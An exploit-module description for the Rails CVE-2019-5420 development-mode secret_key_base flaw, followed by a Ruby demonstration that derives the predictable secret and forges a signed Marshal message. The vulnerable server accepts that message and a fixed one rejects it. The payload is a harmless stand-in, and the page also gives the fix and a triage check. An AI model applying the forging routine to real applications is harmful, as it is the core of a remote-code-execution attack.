module
Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability
Disclosed: 2019-03-13
Description
This module exploits a vulnerability in Ruby on Rails (CVE-2019-5420, fixed in 5.2.2.1 and 6.0.0.beta3). When an affected application runs in development mode, its secret_key_base is not random: Rails derives it from the application's class name, and a remote user can learn that name by requesting a path that does not exist and reading the development-mode error page. Because every signing and encryption key in a Rails application is derived from secret_key_base, an attacker who knows it can sign a serialized (Marshal) payload that the application treats as genuine, deliver it to a route that verifies and deserializes such messages, and gain remote code execution. The practical check is simple: an application that renders a Rails development error page to the public is exposed, regardless of what else is patched, and should be run with RAILS_ENV=production (or upgraded to a fixed release if development mode is genuinely required).
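The following is an added example, not the Metasploit module's code and not Rails' own source. It mirrors how Rails 5.2 (before 5.2.2.1) derived the development secret (MD5 of the application class name), how per-purpose verifier keys are stretched from secret_key_base with PBKDF2-HMAC-SHA1, and the ActiveSupport::MessageVerifier wire format (base64 of the Marshal dump, "--", hex HMAC-SHA1), alongside the fixed behaviour of a random secret persisted under tmp/development_secret.txt. The application name `Blog::Application`, the verifier name `example_purpose` and the payload are constructed for the example; the payload is a harmless Hash standing in for a deserialization gadget, and the metadata envelope Rails adds when a `purpose:` is supplied is omitted. The point it demonstrates is that knowing only the class name is enough to forge a message the vulnerable application accepts, and that the fix removes that property.

```ruby
require 'digest'
require 'base64'
require 'openssl'
require 'securerandom'
require 'tmpdir'

# Rails 5.2 (before 5.2.2.1) in development mode: secret_key_base is the MD5
# hex digest of the application class name, so anyone who learns the name
# (e.g. from the development error page) has the secret.
def vulnerable_dev_secret_key_base(app_class_name)
  Digest::MD5.hexdigest(app_class_name)
end

# Fixed behaviour (5.2.2.1 / 6.0.0.beta3): a random secret, persisted under
# tmp/development_secret.txt so it survives restarts but cannot be predicted.
def fixed_dev_secret_key_base(tmp_dir)
  path = File.join(tmp_dir, 'development_secret.txt')
  File.write(path, SecureRandom.hex(64)) unless File.exist?(path)
  File.read(path).strip
end

# Mirrors Rails.application.message_verifier(name): the per-purpose key is
# PBKDF2-HMAC-SHA1(secret_key_base, salt = name, 1000 iterations, 64 bytes).
# Every such key is therefore recoverable from secret_key_base alone.
def derive_verifier_key(secret_key_base, verifier_name)
  OpenSSL::KDF.pbkdf2_hmac(secret_key_base, salt: verifier_name,
                           iterations: 1000, length: 64, hash: 'sha1')
end

# Minimal stand-in for ActiveSupport::MessageVerifier's wire format:
# base64(serializer.dump(value)) + "--" + hex(HMAC-SHA1(key, base64 part)).
# The default serializer is Marshal, which is what makes a forged message
# dangerous: the receiver runs Marshal.load on attacker-chosen bytes.
class MiniVerifier
  def initialize(key, serializer: Marshal)
    @key = key
    @serializer = serializer
  end

  def generate(value)
    data = Base64.strict_encode64(@serializer.dump(value))
    "#{data}--#{digest_of(data)}"
  end

  # Returns the deserialized value, or nil when the signature does not match.
  def verified(signed_message)
    data, sig = signed_message.to_s.split('--', 2)
    return nil unless data && sig && constant_time_equal?(sig, digest_of(data))
    @serializer.load(Base64.strict_decode64(data))
  end

  private

  def digest_of(data)
    OpenSSL::HMAC.hexdigest('SHA1', @key, data)
  end

  def constant_time_equal?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Attacker side: only the application class name (assumed to have been read
# from the development error page) and the verifier name are needed.
def forge_signed_message(app_class_name, verifier_name, value)
  key = derive_verifier_key(vulnerable_dev_secret_key_base(app_class_name), verifier_name)
  MiniVerifier.new(key).generate(value)
end

# Server side: verifies with whatever secret_key_base the app really runs with.
def server_accepts(secret_key_base, verifier_name, signed_message)
  key = derive_verifier_key(secret_key_base, verifier_name)
  MiniVerifier.new(key).verified(signed_message)
end

if $PROGRAM_NAME == __FILE__
  app = 'Blog::Application' # constructed example name, not a real target
  payload = { 'marker' => 'harmless stand-in for a Marshal gadget' }
  forged = forge_signed_message(app, 'example_purpose', payload)
  # Vulnerable app: the forged message verifies and is deserialized.
  p server_accepts(vulnerable_dev_secret_key_base(app), 'example_purpose', forged)
  # Fixed app: the secret is random, so the same message is rejected (nil).
  Dir.mktmpdir { |d| p server_accepts(fixed_dev_secret_key_base(d), 'example_purpose', forged) }
end
```

The Marshal.load in `verified` is where a real gadget would execute; the example deliberately carries a plain Hash so it shows the acceptance decision without a code-execution chain. For triage, the same derivation can be used defensively: compute the MD5 of your application's class name and confirm that no signed cookie or message on a reachable host validates under it.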
